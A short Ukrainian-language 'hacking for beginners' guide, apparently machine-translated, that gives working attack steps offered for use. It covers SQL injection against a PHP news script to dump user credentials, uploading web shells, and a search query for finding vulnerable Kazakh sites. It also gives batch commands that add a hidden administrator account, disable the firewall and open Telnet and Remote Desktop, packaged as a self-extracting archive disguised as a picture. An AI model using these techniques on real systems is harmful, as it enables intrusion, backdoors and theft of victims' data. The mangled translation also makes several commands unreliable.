методи злому
[Хакерство для новачків]
$ Id = $ _REQUEST [ 'id'];
$ Res = mysql_query ( "SELECT * FROM news WHERE id_news = $ id");
Якщо вона не фільтрується то вийде помилка:
(Warning: mysql (): supplied argument is not a valid MySQL result resource in)
Далі йде обчислення полів у таблиці за допомогою параметра ORDER BY
Припустимо полів 7 з них 3 виводяться на сайті.
Виводяться поля 3, 5. Дізнаємося версію бази MySQL за допомогою version ()
На сайті в 3м поле буде написана версія бази. Припустимо це 5 версія.
У всіх версіях вище 4 ой є універсальні таблиці INFORMATION_SCHEMA.TABLES і поле TABLE_NAME.
INFORMATION_SCHEMA.COLUMNS і поле COLUMN_NAME
Тепер в 3м поле вийдуть всі таблиці які знаходяться в базі.
Всі колонки знаходяться в таблицях.
Далі знаходимо таблицю наприклад users і поле наприклад user_name, user_pass, user_email, user_mobile, user_address
Маючи доступ до адміке сайту можна використовувати уразливість нібито PHP - injection
Тобто залити на сервер шелл. (Спец php скрипт який забезпечує повний доступ до сервера і хостингу в загальному, тое Тобто якщо на сервері знаходитися не один сайт а 50 - 100 то з його допомогою можна отримати доступ до редагування всіх сайтів і управлінні операційної системи сервера ) на приклад r57shell або c99madshell.
Знайти подібну уразливість на сайтах не важко потрібно всього лише ввести в google.com
запит: inurl: news.php? id = 5 site: kz Warning: mysql
За запитом вийде дуже багато вразливих сайтів, що знаходяться в Казахстані.
Злом комп'ютера.
Є дуже багато способів, але я розповім про універсальний, з його допомогою можна буде отримати повний доступ до комп'ютера аж до підключення до робочого столу.
chcp тисячу двісті п'ятьдесят одна
net user coolz 12333 / add
net localgroup Адміністратори coolz / add
net localgroup Administrators coolz / add
net stop sharedaccess
sc config tlntsvr start = auto
tlntadmn config port = 972 sec = -NTLM
net start Telnet
Створюється окремий користувач в системі coolz і задається пароль 12333
Далі присвоюються права адміністратора. І відкривається порт 972.
За тим вибираєш файл який потрібно "впарити" нехай це буде картинка 1.jpg
Path =% WinDir% temp
SavePath
Setup = cool.bat
Setup = 1.exe
Silent = 1
Все замаскований архів з батники готовий
Тобто після того як відкривається архів виконується бат файл за тим відкривається картинка
Після підключення до комп'ютера можна відкрити доступ до віддаленого управління
Для цього в командному рядку вводяться такі параметри
chcp тисячу двісті п'ятьдесят одна
net localgroup Користувачі віддаленого робочого столу coolz / add
net accounts / maxpwage: unlimited
REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" / v "coolz" / t REG_DWORD / d 0 / f
net stop sharedaccess
sc config sharedaccess start = disabled
sc config tlntsvr start = auto
Про злом ящика скажу коротко.
Є 3 способи злому:
1й перебір пароля за словником
2й використання XSS уразливості
3й соц.інженерія